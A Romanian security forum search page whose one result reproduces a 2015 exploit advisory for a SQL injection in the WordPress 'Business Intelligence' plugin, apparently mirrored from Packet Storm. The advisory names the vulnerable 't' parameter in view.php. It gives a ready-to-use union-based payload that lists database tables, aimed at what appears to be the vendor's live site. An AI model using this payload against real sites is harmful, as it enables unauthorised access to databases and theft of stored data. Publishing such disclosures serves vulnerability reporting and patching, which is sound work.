Jump to content

Search the Community

Showing results for tags '^_^'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 1 result

  1. ################################################################################################## #Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : https://www.wpbusinessintelligence.com #Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip #Date : 1/04/2015 #Discovered at : IndiShell Lab #Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ################################################################################################## //////////////////////// /// Overview: //////////////////////// Wordpress plugin "Business Intelligence" is not filtering data in GET parameter ' t ', which in is file 'view.php' and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place. /////////////////////////////// // Vulnerability Description: / /////////////////////////////// vulnerability is due to parameter " t " in file 'view.php'. user can inject sql query uning GET parameter 't' //////////////// /// POC //// /////////////// POC Image URL---> ================= Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting SQL Injection in parameter 't' (file 'view.php'): ================================================= Injectable Link---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php?t=1 Union based SQL injection exist in the parameter which can be exploited as follows: Payload used in Exploitation for Database name ---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php ?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+ ################################################################################################### --==[[special Thanks to]]==-- # Manish Kishan Tanwar # Source: http://packetstorm.wowhacker.com/1504-exploits/wpbusinessintelligence-sql.txt
×
×
  • Create New...